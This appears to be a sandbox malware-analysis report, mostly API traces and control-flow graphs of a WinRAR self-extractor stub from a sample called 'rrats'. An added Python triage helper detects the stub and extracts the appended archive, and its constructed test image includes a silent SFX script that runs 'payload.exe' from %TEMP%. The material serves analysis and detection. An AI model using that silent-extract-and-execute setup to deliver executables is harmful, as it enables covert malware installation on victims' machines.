• Single-node entries: 00CBB1B0 GetDlgItem KiUserCallbackDispatcher ShowWindow SendMessageW; 00CBA440 GdipCloneImage GdipAlloc; 00CBA400 GdipDisposeImage GdipFree; 00CD1F40 CloseHandle; 00CC6000 QueryPerformanceFrequency QueryPerformanceCounter; 00CBF530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter (___security_init_cookie); 00CBFF30 LocalFree; 00CCC030 GetProcessHeap.

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00CB0863: GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
                                                                • Part of subcall function 00CB0863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
                                                                • Part of subcall function 00CB0863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
                                                                • Part of subcall function 00CBA64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00CBA655
                                                                • Part of subcall function 00CBAC16: OleInitialize.OLE32(00000000), ref: 00CBAC2F
                                                                • Part of subcall function 00CBAC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00CBAC66
                                                                • Part of subcall function 00CBAC16: SHGetMalloc.SHELL32(00CE8438), ref: 00CBAC70
                                                              • GetCommandLineW.KERNEL32 ref: 00CBDF5C
                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00CBDF83
                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00CBDF94
                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00CBDFCE
                                                                • Part of subcall function 00CBDBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00CBDBF4
                                                                • Part of subcall function 00CBDBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00CBDC30
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CBDFD7
                                                              • GetModuleFileNameW.KERNEL32(00000000,00CFEC90,00000800), ref: 00CBDFF2
                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00CFEC90), ref: 00CBDFFE
                                                              • GetLocalTime.KERNEL32(?), ref: 00CBE009
                                                              • _swprintf.LIBCMT ref: 00CBE048
                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00CBE05A
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00CBE061
                                                              • LoadIconW.USER32(00000000,00000064), ref: 00CBE078
                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00CBE0C9
                                                              • Sleep.KERNELBASE(?), ref: 00CBE0F7
                                                              • DeleteObject.GDI32 ref: 00CBE130
                                                              • DeleteObject.GDI32(?), ref: 00CBE140
                                                              • CloseHandle.KERNEL32 ref: 00CBE183
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                              • API String ID: 3049964643-2656992072
                                                              • Opcode ID: 85f4a0330fb5174cb7a119a08879557515ce822e7952d8cc6e57ea827cd68bd6
                                                              • Instruction ID: 87db6cdba0d8ed761fca349c12857a474e2bf67903ce721f010d1d2e961c6fbc
                                                              • Opcode Fuzzy Hash: 85f4a0330fb5174cb7a119a08879557515ce822e7952d8cc6e57ea827cd68bd6
                                                              • Instruction Fuzzy Hash: 3C610671505385AFD320AFB5EC89FBF37ACEB45700F04042AF946962A2DB789E44D762
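The API trace above is characteristic of the WinRAR self-extractor stub: OpenFileMappingW on winrarsfxmappingfile.tmp, the sfxcmd / sfxpar / sfxname / sfxstime environment variables, the STARTDLG dialog, and the ShellExecuteExW / WaitForInputIdle path in the call graph that runs whatever the archive script names after extraction. The Python triage helper below is an added example, not part of the Joe Sandbox report and not WinRAR's own code: it checks a file image for those stub markers, locates the appended archive by the public RAR4 / RAR5 marker bytes, and, as a heuristic that only works when the SFX comment is stored as plain text, pulls out the script directives (Setup=, Silent=, Path=, ...) that decide what runs after extraction. The image it scans is constructed inline; the payload name and path in it are placeholders, not values from the analysed sample.

```python
"""Added triage helper (not from the Joe Sandbox report): flag WinRAR SFX stub
markers and locate the archive appended to the stub.

Assumptions: the marker strings below are those the stub passes to the W-APIs
in the trace; RAR4_SIG / RAR5_SIG are the public archive magic values; the
directive names are WinRAR SFX script commands and are only found when the
archive comment is stored as plain text.
"""
import re
from dataclasses import dataclass, field

RAR4_SIG = b"Rar!\x1a\x07\x00"        # RAR 1.5 - 4.x archive marker
RAR5_SIG = b"Rar!\x1a\x07\x01\x00"    # RAR 5.x archive marker

# Strings the stub hands to OpenFileMappingW / SetEnvironmentVariableW /
# DialogBoxParamW.  W-API arguments are UTF-16LE, so both encodings are tried.
STUB_STRINGS = ("winrarsfxmappingfile.tmp", "sfxcmd", "sfxpar",
                "sfxname", "sfxstime", "STARTDLG")

# SFX script directives; "Setup=" names the command run after extraction
# (the ShellExecuteExW / WaitForInputIdle path in the call graph).
SCRIPT_DIRECTIVES = re.compile(
    rb"(?<![A-Za-z0-9_])(Setup|Presetup|Silent|Path|Overwrite|TempMode|Title)"
    rb"=([^\r\n\x00]*)")


@dataclass
class SfxTriage:
    is_pe: bool
    stub_strings: list = field(default_factory=list)
    archive_offset: int = -1       # -1 when no RAR marker follows the stub
    archive_format: str = ""
    directives: dict = field(default_factory=dict)

    @property
    def looks_like_winrar_sfx(self) -> bool:
        # Require a PE header, at least two stub markers and an appended archive.
        return self.is_pe and len(self.stub_strings) >= 2 and self.archive_offset >= 0


def triage(data: bytes) -> SfxTriage:
    """Scan a file image for stub markers, the archive marker and script lines."""
    result = SfxTriage(is_pe=data[:2] == b"MZ")
    for s in STUB_STRINGS:
        if s.encode("utf-16-le") in data or s.encode("ascii") in data:
            result.stub_strings.append(s)
    for sig, fmt in ((RAR5_SIG, "RAR5"), (RAR4_SIG, "RAR4")):
        off = data.find(sig)
        if off != -1:
            result.archive_offset, result.archive_format = off, fmt
            break
    if result.archive_offset >= 0:
        # Only look past the archive marker so stub code bytes cannot match.
        for m in SCRIPT_DIRECTIVES.finditer(data[result.archive_offset:]):
            key = m.group(1).decode("ascii")
            result.directives[key] = m.group(2).strip().decode("latin-1")
    return result


def extract_archive(data: bytes, result: SfxTriage) -> bytes:
    """Return the appended archive bytes for hand-off to an unpacker."""
    return b"" if result.archive_offset < 0 else data[result.archive_offset:]


def build_sample() -> bytes:
    """Constructed stand-in for an SFX image (placeholder names, not the real sample)."""
    stub = bytearray(b"MZ" + b"\x00" * 62)
    stub += b"\x90" * 100
    stub += "winrarsfxmappingfile.tmp".encode("utf-16-le") + b"\x00\x00"
    stub += "sfxcmd".encode("utf-16-le") + b"\x00\x00"
    stub += b"STARTDLG\x00"
    comment = (b"Path=%TEMP%\\upd\r\nSilent=1\r\nOverwrite=1\r\n"
               b"Setup=payload.exe\r\n")
    return bytes(stub) + RAR5_SIG + b"\x00" * 16 + comment


if __name__ == "__main__":
    sample = build_sample()
    r = triage(sample)
    print(f"winrar_sfx={r.looks_like_winrar_sfx} format={r.archive_format} "
          f"archive_offset={r.archive_offset} markers={r.stub_strings}")
    for k, v in r.directives.items():
        print(f"  {k}={v}")
```

Run it as a script for the constructed image, or call triage() on the bytes of a real sample; hand the return value of extract_archive() to an unpacker to list the members and compare the Setup= target against what the sandbox recorded as dropped and executed. A negative result from the directive scan is not proof of absence, since a compressed or absent comment yields no matches.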

                                                              Control-flow Graph for 00CBA6C2 (executed / not-executed block colouring lost in extraction; block order kept): FindResourceW -> SizeofResource -> LoadResource -> LockResource -> GlobalAlloc -> GlobalLock -> call 00CC0320 + CreateStreamOnHGlobal -> call 00CBA626 (GdipAlloc) -> GdipCreateHBITMAPFromBitmap -> GlobalUnlock -> GlobalFree -> return. A failed FindResourceW / SizeofResource / LoadResource / LockResource jumps straight to the return block (00CBA7DB); a failed GlobalAlloc returns via 00CBA7D3; a failed GlobalLock goes to GlobalFree; failures after the stream is created unwind through GlobalUnlock and GlobalFree.
                                                              APIs
                                                              • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6D5
                                                              • SizeofResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA6EC
                                                              • LoadResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA703
                                                              • LockResource.KERNEL32(00000000,?,?,?,00CBB73D,00000066), ref: 00CBA712
                                                              • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CBB73D,00000066), ref: 00CBA72D
                                                              • GlobalLock.KERNEL32(00000000), ref: 00CBA73E
                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CBA762
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00CBA7C6
                                                                • Part of subcall function 00CBA626: GdipAlloc.GDIPLUS(00000010), ref: 00CBA62C
                                                              • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CBA7A7
                                                              • GlobalFree.KERNEL32(00000000), ref: 00CBA7CD
                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same module image as the function above (source file 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, offset 00CA0000, based on PE; snapshot file hcaresult_0_2_ca0000_rrats.jbxd)
                                                              Similarity
                                                              • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                              • String ID: PNG
                                                              • API String ID: 211097158-364855578
                                                              • Opcode ID: a0373fe29b495eb56bbeffc1de5d170a65f168aa447ef7dcc78face7ca66a916
                                                              • Instruction ID: 5b0a298e01830bf7947d0bb3c3cf93b6742cfc1ab03abbf7f4e5508ad63cdd72
                                                              • Opcode Fuzzy Hash: a0373fe29b495eb56bbeffc1de5d170a65f168aa447ef7dcc78face7ca66a916
                                                              • Instruction Fuzzy Hash: FF31B1B5605352AFC7109F61EC88F5FBBB8EF84750F04052AF895A2221EF31DD44DAA2

                                                              Control-flow Graph for 00CAA69B (executed / not-executed block colouring lost in extraction; block order kept): call 00CBEC50, then either FindFirstFileW (first call) or FindNextFileW (subsequent calls). If FindFirstFileW fails, call 00CABB03 (path rewrite, _wcslen) and retry FindFirstFileW with a 0x800-character buffer; a second failure reads GetLastError (00CAA6FE). A failed FindNextFileW reads GetLastError (00CAA732). On success the find data is handled by calls to 00CB0602, 00CAC310 and 00CB15DA (x3) before the common return at 00CAA804.
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6C4
                                                                • Part of subcall function 00CABB03: _wcslen.LIBCMT ref: 00CABB27
                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6F2
                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA6FE
                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA728
                                                              • GetLastError.KERNEL32(?,?,?,?,00CAA592,000000FF,?,?), ref: 00CAA734
                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same module image as the functions above (source file 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, offset 00CA0000, based on PE; snapshot file hcaresult_0_2_ca0000_rrats.jbxd)
                                                              Similarity
                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                              • String ID:
                                                              • API String ID: 42610566-0
                                                              • Opcode ID: a40ca5b5e1c166be91db8245beeed0b6c0b28b41296915de75eeb4a039ba72a5
                                                              • Instruction ID: 061d1d20a3d1d9b19154c178986287fcddf59f7c23872170e6ee96712057e01e
                                                              • Opcode Fuzzy Hash: a40ca5b5e1c166be91db8245beeed0b6c0b28b41296915de75eeb4a039ba72a5
                                                              • Instruction Fuzzy Hash: 0A41CE72900516ABCB25DF68CC88BEEB7B8FB49350F004196F969E3210D7346E94CF91
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002,00000000), ref: 00CC7E0F
                                                              • TerminateProcess.KERNEL32(00000000,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002,00000000), ref: 00CC7E16
                                                              • ExitProcess.KERNEL32 ref: 00CC7E28
                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same module image as the functions above (source file 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, offset 00CA0000, based on PE; snapshot file hcaresult_0_2_ca0000_rrats.jbxd)
                                                              Similarity
                                                              • API ID: Process$CurrentExitTerminate
                                                              • String ID:
                                                              • API String ID: 1703294689-0
                                                              • Opcode ID: 78f024125259ac2491d7fa47ed17173bd1253d1b7a5dca8a0a1cca79eff5b849
                                                              • Instruction ID: 5964a7dbf308e2252afbd4d442ae67ad4398d57d0bab2fad6ecaff0cd394d3b9
                                                              • Opcode Fuzzy Hash: 78f024125259ac2491d7fa47ed17173bd1253d1b7a5dca8a0a1cca79eff5b849
                                                              • Instruction Fuzzy Hash: 74E0B632005188AFCF116F64DD0AF4E7F6AEB50341F04455DF819AA172CB3AEE92DA91
                                                              APIs: none (function body is CRT prologue only, see API ID below)
                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same module image as the functions above (source file 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, offset 00CA0000, based on PE; snapshot file hcaresult_0_2_ca0000_rrats.jbxd)
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 407274834f907fc64fa113d5c879b9ac67be0379a819f2248b8d975872bfc601
                                                              • Instruction ID: 9531fe5b9fd9112753c3a96558579ea770b07dc488426c470a08c3315f07bdef
                                                              • Opcode Fuzzy Hash: 407274834f907fc64fa113d5c879b9ac67be0379a819f2248b8d975872bfc601
                                                              • Instruction Fuzzy Hash: D182FA70904147AFDF15DB64C895BFABBB9AF07308F0841B9E8599B182DB315B8CDB60
                                                              Memory Dump Source / Joe Sandbox IDA Plugin: same module image as the functions above (source file 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, offset 00CA0000, based on PE; snapshot file hcaresult_0_2_ca0000_rrats.jbxd)
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 054ed9539275ed83360fa25c9ed9e500a6e3e0781de40cab2b09193211a250c3
                                                              • Instruction ID: 42e090eeca56ea9b1bf065a764409b1d92f5c0989c47bc9ad27d22fbf2129962
                                                              • Opcode Fuzzy Hash: 054ed9539275ed83360fa25c9ed9e500a6e3e0781de40cab2b09193211a250c3
                                                              • Instruction Fuzzy Hash: 0DD1C6716083818FDB14DF28D94479BBBE1BF89308F08456DEC999B342D778EA05CB56
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CBB7E5
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBB8D1
                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CBB8EF
                                                              • IsDialogMessageW.USER32(?,?), ref: 00CBB902
                                                              • TranslateMessage.USER32(?), ref: 00CBB910
                                                              • DispatchMessageW.USER32(?), ref: 00CBB91A
                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CBB93D
                                                              • EndDialog.USER32(?,00000001), ref: 00CBB960
                                                              • GetDlgItem.USER32(?,00000068), ref: 00CBB983
                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBB99E
                                                              • SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBB9B1
                                                                • Part of subcall function 00CBD453: _wcslen.LIBCMT ref: 00CBD47D
                                                              • SetFocus.USER32(00000000), ref: 00CBB9B8
                                                              • _swprintf.LIBCMT ref: 00CBBA24
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                                • Part of subcall function 00CBD4D4: GetDlgItem.USER32(00000068,00CFFCB8), ref: 00CBD4E8
                                                                • Part of subcall function 00CBD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CBAF07,00000001,?,?,00CBB7B9,00CD506C,00CFFCB8,00CFFCB8,00001000,00000000,00000000), ref: 00CBD510
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CBD51B
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CD35F4), ref: 00CBD529
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD53F
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CBD559
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD59D
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CBD5AB
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CBD5BA
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CBD5E1
                                                                • Part of subcall function 00CBD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CD43F4), ref: 00CBD5F0
                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CBBA68
                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CBBA90
                                                              • GetTickCount.KERNEL32 ref: 00CBBAAE
                                                              • _swprintf.LIBCMT ref: 00CBBAC2
                                                              • GetLastError.KERNEL32(?,00000011), ref: 00CBBAF4
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CBBB43
                                                              • _swprintf.LIBCMT ref: 00CBBB7C
                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CBBBD0
                                                              • GetCommandLineW.KERNEL32 ref: 00CBBBEA
                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CBBC47
                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00CBBC6F
                                                              • WaitForInputIdle.USER32(?,00002710), ref: 00CBBCA5
                                                              • Sleep.KERNEL32(00000064), ref: 00CBBCB9
                                                              • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CBBCE2
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CBBCEB
                                                              • _swprintf.LIBCMT ref: 00CBBD1E
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBBD7D
                                                              • SetDlgItemTextW.USER32(?,00000065,00CD35F4), ref: 00CBBD94
                                                              • GetDlgItem.USER32(?,00000065), ref: 00CBBD9D
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CBBDAC
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00CBBDBB
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBBE68
                                                              • _wcslen.LIBCMT ref: 00CBBEBE
                                                              • _swprintf.LIBCMT ref: 00CBBEE8
                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00CBBF32
                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00CBBF4C
                                                              • GetDlgItem.USER32(?,00000068), ref: 00CBBF55
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00CBBF6B
                                                              • GetDlgItem.USER32(?,00000066), ref: 00CBBF85
                                                              • SetWindowTextW.USER32(00000000,00CEA472), ref: 00CBBFA7
                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00CBC007
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBC01A
                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00CBC0BD
                                                              • EnableWindow.USER32(00000000,00000000), ref: 00CBC197
                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00CBC1D9
                                                                • Part of subcall function 00CBC73F: __EH_prolog.LIBCMT ref: 00CBC744
                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CBC1FD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellShowSleepTickTranslateUnmapWait__vswprintf_c_l
                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                              • API String ID: 2472041962-311033401
                                                              • Opcode ID: 1207c14032c5bcc41516b82e1961b994e1c153c7b4c9aed21a33a4bb8185ddcb
                                                              • Instruction ID: 58acf8636aab97359d517737fcdfb19e305b51ced1f4daab384fd97a2fdc5da4
                                                              • Opcode Fuzzy Hash: 1207c14032c5bcc41516b82e1961b994e1c153c7b4c9aed21a33a4bb8185ddcb
                                                              • Instruction Fuzzy Hash: E142E670944399BEEB219BB09C8AFFE7B7CAB01700F040055F655E61E2CBB49E45DB62

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 267 cb0863-cb0886 call cbec50 GetModuleHandleW 270 cb0888-cb089f GetProcAddress 267->270 271 cb08e7-cb0b48 267->271 274 cb08b9-cb08c9 GetProcAddress 270->274 275 cb08a1-cb08b7 270->275 272 cb0b4e-cb0b59 call cc75fb 271->272 273 cb0c14-cb0c40 GetModuleFileNameW call cac29a call cb0602 271->273 272->273 285 cb0b5f-cb0b8d GetModuleFileNameW CreateFileW 272->285 290 cb0c42-cb0c4e call cab146 273->290 276 cb08cb-cb08e0 274->276 277 cb08e5 274->277 275->274 276->277 277->271 287 cb0c08-cb0c0f CloseHandle 285->287 288 cb0b8f-cb0b9b SetFilePointer 285->288 287->273 288->287 291 cb0b9d-cb0bb9 ReadFile 288->291 297 cb0c7d-cb0ca4 call cac310 GetFileAttributesW 290->297 298 cb0c50-cb0c5b call cb081b 290->298 291->287 293 cb0bbb-cb0be0 291->293 295 cb0bfd-cb0c06 call cb0371 293->295 295->287 303 cb0be2-cb0bfc call cb081b 295->303 306 cb0cae 297->306 307 cb0ca6-cb0caa 297->307 298->297 305 cb0c5d-cb0c7b CompareStringW 298->305 303->295 305->297 305->307 311 cb0cb0-cb0cb5 306->311 307->290 310 cb0cac 307->310 310->311 312 cb0cec-cb0cee 311->312 313 cb0cb7 311->313 314 cb0dfb-cb0e05 312->314 315 cb0cf4-cb0d0b call cac2e4 call cab146 312->315 316 cb0cb9-cb0ce0 call cac310 GetFileAttributesW 313->316 326 cb0d0d-cb0d6e call cb081b * 2 call cae617 call ca4092 call cae617 call cba7e4 315->326 327 cb0d73-cb0da6 call ca4092 AllocConsole 315->327 322 cb0cea 316->322 323 cb0ce2-cb0ce6 316->323 322->312 323->316 325 cb0ce8 323->325 325->312 333 cb0df3-cb0df5 ExitProcess 326->333 332 cb0da8-cb0ded GetCurrentProcessId AttachConsole call cc3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 327->332 327->333 332->333
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00CB087C
                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00CB088E
                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB08BF
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0B69
                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB0B83
                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00CB0B93
                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,00CD3C7C,00000000), ref: 00CB0BB1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00CB0C09
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00CB0C1E
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00CD3C7C,?,00000000,?,00000800), ref: 00CB0C72
                                                              • GetFileAttributesW.KERNELBASE(?,?,00CD3C7C,00000800,?,00000000,?,00000800), ref: 00CB0C9C
                                                              • GetFileAttributesW.KERNEL32(?,?,00CD3D44,00000800), ref: 00CB0CD8
                                                                • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
                                                                • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
                                                              • _swprintf.LIBCMT ref: 00CB0D4A
                                                              • _swprintf.LIBCMT ref: 00CB0D96
                                                                • Part of subcall function 00CA4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA40A5
                                                              • AllocConsole.KERNEL32 ref: 00CB0D9E
                                                              • GetCurrentProcessId.KERNEL32 ref: 00CB0DA8
                                                              • AttachConsole.KERNEL32(00000000), ref: 00CB0DAF
                                                              • _wcslen.LIBCMT ref: 00CB0DC4
                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00CB0DD5
                                                              • WriteConsoleW.KERNEL32(00000000), ref: 00CB0DDC
                                                              • Sleep.KERNEL32(00002710), ref: 00CB0DE7
                                                              • FreeConsole.KERNEL32 ref: 00CB0DED
                                                              • ExitProcess.KERNEL32 ref: 00CB0DF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                              • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                              • API String ID: 1207345701-3298887752
                                                              • Opcode ID: ca86e1d95daeed03c58bb98b66e307e2bfdc3229d33bca8b6397e19bd333ce40
